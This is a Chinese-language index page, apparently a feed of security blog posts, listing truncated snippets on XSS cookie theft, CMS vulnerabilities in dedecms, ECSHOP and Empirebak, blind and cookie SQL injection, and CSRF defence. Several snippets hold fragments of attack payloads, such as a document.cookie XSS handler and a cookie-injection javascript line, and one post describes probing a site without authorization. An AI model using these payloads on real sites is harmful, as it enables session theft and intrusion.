xxx.1 xss 配合php获取cookie和session的脚本 <script>document.write('&...
moonsec_com
moonsec_com
moonsec_com
CSRF的防御实例(PHP)
CSRF的防御可以从服务端和客户端两方面着手,防御效果是从服务端着手效果比较好,现在一般的CSRF防御也都在服务端进行。
moonsec_com
芒果云KODExlporer设计缺陷导致随意登陆后台
芒果云KODExlporer设计缺陷导致随意登陆后台 这个最新版已经失效了 思路不错 转过来学习一下。
moonsec_com
学员渗透录二十六_XSS从初级到高级之初级利用篇
继续我们ant的xss 高级系列教程 学员渗透录 二十六XSS从初级到高级之 初级利用Cookie(Session)的盗取与利用
moonsec_com
帝国备份王(Empirebak)万能cookie及拿shell
帝国备份王(Empirebak)万能cookie及拿shell 漏洞 作者: Flow 1.伪造cookie登录系统(其实这一步多余的,大多用户连密码都没改,都是默认的123456...
moonsec_com
(首发)dedecms 5.7 最新漏洞(绝非网上公布的)
请看看文件:include/filter.inc.php 引用一哥话语: 这是2B的dede再次变量覆盖漏洞根源。。 这是过滤或替换非法关键字。正常的。 /* 对_GET,_POST,_COOKIE进...
moonsec_com
emblog 编辑器xss 跨死你无压力
xss 操翻你们 完全没有压力<span onmouseover="javascript:alert(document.cookie)">alert(doc...
moonsec_com
ECSHOP最新cookie验证不严漏洞 2013 6月全版本通杀
这个漏洞是我们在进行非授权安全评估时候发现的。是一个ecshop的站,通过以往的0day爆出了管理员密码,无奈解不开。。。于是就想,有没有可能将密文md5存入cookie中登陆。
颓废's Blog
cookie一键式注射工具
使用方法很简单,如下图所示 Remove All是移除所有cookie信息,Set All是设置cookie,通常是document.cookie得到的字符串。
颓废's Blog
DM企业建站系统前台盲注
前台cookie 时间盲注 该套cms主要的安全措施为htmlentities,在POST&&GET的输入点做了html实体化的操作,但是这并不转义单引号(默认不转...
颓废's Blog
透过F5获取服务器真实内网IP
透测试过程中,经常会遇到目标服务器使用F5 LTM做负载均衡。 如果能获取到目标服务器的真实IP地址,会给后续渗透带来一定便利。 本文既是最近渗透遇到的一点点经验分享。 F5修改c...
颓废's Blog
asp类型网站漏洞0day总结
启航企业建站系统 cookie注入漏洞通杀所有版本 直接上exploit: javascript:alert(document.cookie="id="+escape("1 and...
